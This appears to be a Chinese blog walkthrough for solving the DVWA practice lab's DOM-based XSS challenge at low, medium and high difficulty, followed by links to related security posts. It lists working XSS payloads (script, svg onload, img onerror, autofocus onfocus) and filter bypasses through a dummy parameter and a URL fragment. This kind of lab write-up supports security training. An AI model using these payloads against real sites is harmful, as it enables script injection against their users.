【dvwa靶场:XSS系列】XSS (DOM) 低-中-高级别,通关啦

一、低级low

拼接的url样式:​​​​​​​

http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default= 拼接的新内容

复制代码
<script>alert("假客套")</script>

二、中级middle

拼接的url样式:​​​​​​​
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default= 拼接的新内容

过滤了script,使用其他标签拼接新的,新的拼接如下四选一

复制代码
</select><svg onload=alert('假客套');>

</select><img src=x onerror=alert("假客套")>

注意这里的autofocus会一直自动加载弹窗,不加无效

复制代码
<select><input onfocus = alert('假客套') autofocus/>

"><input onfocus = alert('假客套') autofocus/>

三、高级high

拼接的url样式:

​​​​​​​http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English 拼接的新内容

过滤了script,使用其他标签拼接新的,新的拼接如下二选一

自定义一个参数名,拼接假的采纳数传递过去,比如不存在的name

复制代码
&name=<script>alert("假客套")</script>

# 注释掉后续不传给后端,也不过滤

复制代码
#<script>alert("假客套")</script>
相关推荐
Johny_Zhao20 小时前
Centos8搭建hadoop高可用集群
linux·hadoop·python·网络安全·信息安全·云计算·shell·yum源·系统运维·itsm
落鹜秋水1 天前
Cacti命令执行漏洞分析(CVE-2022-46169)
web安全·网络安全
pencek2 天前
XCTF-crypto-幂数加密
网络安全
会议之眼2 天前
截稿倒计时 TrustCom‘25大会即将召开
网络安全
周先森的怣忈2 天前
渗透高级-----测试复现(第三次作业)
网络安全
MUY09902 天前
OSPF之多区域
网络·网络安全
波吉爱睡觉2 天前
文件解析漏洞大全
web安全·网络安全
青藤云安全2 天前
青藤天睿RASP再次发威!捕获E签宝RCE 0day漏洞
网络安全
pencek3 天前
HakcMyVM-Medusa
网络安全
Whoisshutiao4 天前
网安-SQL注入-sqli-labs
数据库·sql·网络安全